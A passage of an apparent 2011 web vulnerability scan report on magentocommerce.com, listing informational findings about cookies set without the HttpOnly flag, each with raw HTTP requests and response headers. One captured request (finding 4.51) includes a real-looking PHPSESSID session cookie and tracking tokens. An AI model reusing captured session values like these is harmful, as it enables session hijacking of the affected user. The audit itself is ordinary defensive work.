Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.44. http://www.magentocommerce.com/es  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.45. http://www.magentocommerce.com/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.46. http://www.magentocommerce.com/he  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.47. http://www.magentocommerce.com/hu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.48. http://www.magentocommerce.com/imagine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.49. http://www.magentocommerce.com/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.50. http://www.magentocommerce.com/jobs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.51. http://www.magentocommerce.com/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.52. http://www.magentocommerce.com/jobs/p/2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.53. http://www.magentocommerce.com/knowledge-base  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.54. http://www.magentocommerce.com/license/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.55. http://www.magentocommerce.com/license/enterprise-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.56. http://www.magentocommerce.com/lodger-footwear/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.57. http://www.magentocommerce.com/lt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.58. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.59. http://www.magentocommerce.com/maps/online  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

